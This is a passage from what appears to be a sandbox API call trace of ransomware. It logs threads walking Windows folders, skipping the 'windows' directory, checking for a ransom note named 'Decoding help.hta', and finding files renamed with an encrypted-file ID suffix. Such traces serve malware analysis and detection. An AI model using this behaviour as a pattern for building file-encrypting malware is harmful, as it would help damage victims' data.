cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\decoding help.hta")) returned 0x1 [0044.951] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0044.951] lstrlenW (lpString="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned 34 [0044.951] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0044.951] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x1a51fd30 | out: lpFindFileData=0x1a51fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x2382bc10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x6f998, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VCREDI~1._ID")) returned 1 [0044.951] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0044.951] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned 79 [0044.951] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" [0044.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\decoding help.hta")) returned 0x1 [0044.952] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0044.952] lstrlenW (lpString="vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned 41 [0044.952] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0044.952] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x1a51fd30 | out: lpFindFileData=0x1a51fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x2382bc10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x6f998, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VCREDI~1._ID")) returned 0 [0044.952] FindClose (in: hFindFile=0x5e28b0 | out: hFindFile=0x5e28b0) returned 1 Thread: id = 409 os_tid = 0xb3c [0043.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*", lpFindFileData=0x1a65fd30 | out: lpFindFileData=0x1a65fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x22f3e990, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22f3e990, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e28f0 [0044.963] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.963] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x1a65fd30 | out: lpFindFileData=0x1a65fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x22f3e990, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22f3e990, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.963] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.963] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.963] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x1a65fd30 | out: lpFindFileData=0x1a65fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29423840, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz.dat", cAlternateFileName="5P5NRG~1.DAT")) returned 1 [0044.963] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" [0044.963] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned 58 [0044.963] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta" [0044.963] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\decoding help.hta")) returned 0x1 [0044.963] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x1a65fd30 | out: lpFindFileData=0x1a65fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x22f18830, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x22f18830, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22f18830, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0044.963] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" [0044.963] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned 58 [0044.963] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta" [0044.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\decoding help.hta")) returned 0x1 [0044.964] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0044.964] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x1a65fd30 | out: lpFindFileData=0x1a65fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0044.964] lstrcmpW (lpString1=".", lpString2="Default Pictures") returned -1 [0044.964] lstrcmpW (lpString1="..", lpString2="Default Pictures") returned -1 [0044.964] lstrcmpiW (lpString1="windows", lpString2="Default Pictures") returned 1 [0044.964] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" [0044.964] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned 58 [0044.964] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="Default Pictures" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures" [0044.964] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0044.964] GlobalMemoryStatus (in: lpBuffer=0x1a65fd10 | out: lpBuffer=0x1a65fd10) [0044.964] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112ec1d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x47c [0044.977] CloseHandle (hObject=0x47c) returned 1 [0044.977] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x1a65fd30 | out: lpFindFileData=0x1a65fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x22f3e990, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0xc638, dwReserved0=0x0, dwReserved1=0x0, cFileName="guest.bmp.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="")) returned 1 [0044.977] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" [0044.977] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned 58 [0044.977] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta" [0044.977] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\decoding help.hta")) returned 0x1 [0044.978] lstrcmpiW (lpString1="Decoding help.hta", lpString2="guest.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0044.978] lstrlenW (lpString="guest.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned 34 [0044.978] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0044.978] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x1a65fd30 | out: lpFindFileData=0x1a65fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x22f64af0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0xc638, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.bmp.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="")) returned 1 [0044.978] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" [0044.978] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned 58 [0044.978] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta" [0044.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\decoding help.hta")) returned 0x1 [0044.978] lstrcmpiW (lpString1="Decoding help.hta", lpString2="user.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0044.978] lstrlenW (lpString="user.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned 33 [0044.978] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0044.978] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x1a65fd30 | out: lpFindFileData=0x1a65fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x22f64af0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0xc638, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.bmp.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="")) returned 0 [0044.978] FindClose (in: hFindFile=0x5e28f0 | out: hFindFile=0x5e28f0) returned 1 Thread: id = 410 os_tid = 0xa78 [0043.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*", lpFindFileData=0x1a79fd30 | out: lpFindFileData=0x1a79fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2930 [0044.976] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.976] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1a79fd30 | out: lpFindFileData=0x1a79fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.976] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.976] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.976] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1a79fd30 | out: lpFindFileData=0x1a79fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.0", cAlternateFileName="")) returned 1 [0044.976] lstrcmpW (lpString1=".", lpString2="v3.0") returned -1 [0044.976] lstrcmpW (lpString1="..", lpString2="v3.0") returned -1 [0044.976] lstrcmpiW (lpString1="windows", lpString2="v3.0") returned 1 [0044.976] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" [0044.976] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned 70 [0044.976] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\", lpString2="v3.0" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0" [0044.976] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" [0044.976] GlobalMemoryStatus (in: lpBuffer=0x1a79fd10 | out: lpBuffer=0x1a79fd10) [0044.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95e1c80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x488 [0044.992] CloseHandle (hObject=0x488) returned 1 [0044.992] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1a79fd30 | out: lpFindFileData=0x1a79fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0044.992] lstrcmpW (lpString1=".", lpString2="v3.5") returned -1 [0044.992] lstrcmpW (lpString1="..", lpString2="v3.5") returned -1 [0044.992] lstrcmpiW (lpString1="windows", lpString2="v3.5") returned 1 [0044.992] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" [0044.992] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned 70 [0044.992] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\", lpString2="v3.5" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5" [0044.992] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0044.992] GlobalMemoryStatus (in: lpBuffer=0x1a79fd10 | out: lpBuffer=0x1a79fd10) [0044.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11304238, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x488 [0045.003] CloseHandle (hObject=0x488) returned 1 [0045.003] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1a79fd30 | out: lpFindFileData=0x1a79fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0045.003] FindClose (in: hFindFile=0x5e2930 | out: hFindFile=0x5e2930) returned 1 Thread: id = 411 os_tid = 0xb48 [0043.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*", lpFindFileData=0x1a8dfd30 | out: lpFindFileData=0x1a8dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2970 [0044.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.989] FindNextFileW (in: hFindFile=0x5e2970, lpFindFileData=0x1a8dfd30 | out: lpFindFileData=0x1a8dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.989] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.989] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.990] FindNextFileW (in: hFindFile=0x5e2970, lpFindFileData=0x1a8dfd30 | out: lpFindFileData=0x1a8dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0044.990] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0044.990] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0044.990] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0044.990] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*" [0044.990] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*") returned 90 [0044.990] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0044.990] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*" [0044.990] GlobalMemoryStatus (in: lpBuffer=0x1a8dfd10 | out: lpBuffer=0x1a8dfd10) [0044.990] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112bc100, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x494 [0045.001] CloseHandle (hObject=0x494) returned 1 [0045.001] FindNextFileW (in: hFindFile=0x5e2970, lpFindFileData=0x1a8dfd30 | out: lpFindFileData=0x1a8dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0045.001] FindClose (in: hFindFile=0x5e2970 | out: hFindFile=0x5e2970) returned 1 Thread: id = 412 os_tid = 0xb40 [0043.884] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*.*", lpFindFileData=0x1aa1fd30 | out: lpFindFileData=0x1aa1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e29b0 [0045.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.000] FindNextFileW (in: hFindFile=0x5e29b0, lpFindFileData=0x1aa1fd30 | out: lpFindFileData=0x1aa1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 